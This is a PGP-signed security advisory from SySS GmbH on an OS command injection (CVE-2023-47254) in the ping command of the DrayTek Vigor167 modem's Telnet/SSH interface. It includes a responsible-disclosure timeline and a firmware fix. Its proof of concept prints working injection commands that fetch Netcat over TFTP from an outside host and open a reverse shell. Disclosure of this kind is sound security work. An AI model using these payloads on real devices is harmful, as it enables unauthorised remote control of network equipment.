-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2023-023 Product: Vigor167 Manufacturer: DrayTek Affected Version(s): 5.2.2 Tested Version(s): 5.2.2 Vulnerability Type: OS Command Injection (CWE-78) Risk Level: Medium Solution Status: Open Manufacturer Notification: 2023-09-22 Solution Date: 2023-11-16 Public Disclosure: 2023-12-06 CVE Reference: CVE-2023-47254 Author of Advisory: Luna Krone, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: Vigor167 is a VDSL2 35b Supervectoring Modem. The manufacturer describes the product as follows (see [1]): "Vigor167 is a VDSL2 35b modem/router." Due to missing input validation, the command-line interface of the device is vulnerable to an OS command injection. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: Vigor167 has a command-line interface available via both Telnet and SSH. This interface requires a login with any account available in the web interface. This also includes accounts which were denied every access according to their group settings. Afterward, a limited set of commands is available to the user. The ping command present allows injecting commands which are then executed on the device. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): Commands can be injected with backticks (``). The current working directory can be printed out with the following command: vigor> exec ping `pwd` ping: /tmp: Unknown host Another possibility is to wrap the OS command in parentheses following a dollar sign like $(pwd). The available commands are very limited. For example, only a small fraction of the standard output from the injected commands is displayed. Furthermore, space characters lead to evaluation errors. In order to achieve a full reverse shell, some of BusyBox's internal commands can be used. A TFTP server is hosted as preparation on a computer which is reachable by Vigor167 over the network. A statically compiled version of Netcat[2] is hosted on the TFTP server. First, the operating system of Vigor167 is instructed to download the file: vigor> exec ping `busybox${IFS}tftp${IFS}-l${IFS}/tmp/netcat${IFS}-g${IFS}-r${IFS}netcat${IFS}192.168.100.5` BusyBox v1.00 (2023.05.29-03:34+0000) multi-call binary usage: ping [OPTION]... host ${IFS} is a POSIX variable that contains the field separator and serves as replacement for the space character. Then, the executable flag is set on the transferred Netcat binary: vigor> exec ping `chmod${IFS}+x${IFS}/tmp/netcat` BusyBox v1.00 (2023.05.29-03:34+0000) multi-call binary usage: ping [OPTION]... host On the computer hosting the TFTP server, a Netcat listener is opened. Then, a reverse shell can be spawned: vigor> exec ping `/tmp/netcat${IFS}192.168.100.5${IFS}9001${IFS}-e${IFS}ash` The reverse shell is opened to the targeted host: Connection from 192.168.100.1:43354 sh: turning off NDELAY mode pwd /tmp Vigor167 was used in modem mode. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Update the modem's firmware to version 5.2.3. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2023-07-30: Vulnerability discovered 2023-09-22: Vulnerability reported to manufacturer 2023-11-16: Patch released by manufacturer 2023-12-06: Public disclosure of vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product website for Vigor167 https://www.draytek.com/products/vigor167 [2] Statically compiled MIPS32 Netcat https://github.com/darkerego/mips-binaries/blob/master/netcat [3] SySS Security Advisory SYSS-2023-023 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2023-023.txt [4] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Luna Krone of SySS GmbH. E-Mail: luna.krone@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Luna_Krone.asc Key ID: 0x31764595D77A53F2 Key Fingerprint: C7AF 1259 B763 D588 E8D2 B302 3176 4595 D77A 53F2 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEEx68SWbdj1Yjo0rMCMXZFldd6U/IFAmeXkmkACgkQMXZFldd6 U/LqKg//e1kzeuqn/Q/CaXFHT9lOQmtoi+Q7UIZBNyvKkqaKJZi75QELXZwuhiGC t2WjAwDIVBJhdV2lbJVfswZOHMRPPmserPrhqMqOqD20ATlLiGbNSTI5zeZjZVVU cIa9QSPgaX+bPK94cJmHXXlzPmqsZu1ElReMnGhi0T22Jte8EzkQk4KRe8W8VCUN KA6XoM7oKUCkKxSyKWIB3hqqQf53Elm9jo7DfuttR6/loH/oG3yZL/uLpgXMTV+m K1qSrXSCueNPkeY3HbiTqoo2qXodlyTrgeK4zv5HRQsvW2ee0ggvOnABD8bDkMLB 7C2GSO2VPunfjtDDVoj4SxSwo4ad/BFjF99D93D3dB8KpB3A89NeAmnEJiWZzx15 d11Gbdz6GKMTZ/KPY0X0g8ADDxuofqVUhloX+2oEFa37WmkVtPzKyP8timuBtZSX GGpy2zvhkcfnd2D+rJHK/uiXUOBsyXQ6lM5Fh00pRPH/0F9siTKJfpHsxZT0d39t mWycqHTVEUe0S4ICIx6CZukeatPHOrZDmgrWKtLklKwGXmZ10aogCQ0R1WgUYkcn JtxRZkYbnNidgfVW9TBmxUNJYr/griHEzwu2KYgXhOYjqquESqXBBM3OVDL/qVqF 3SMnr1sBMUBv1058K7IDH1aS8+BArzZ/XbEqyq51MktsOOj+cAc= =4v8Q -----END PGP SIGNATURE-----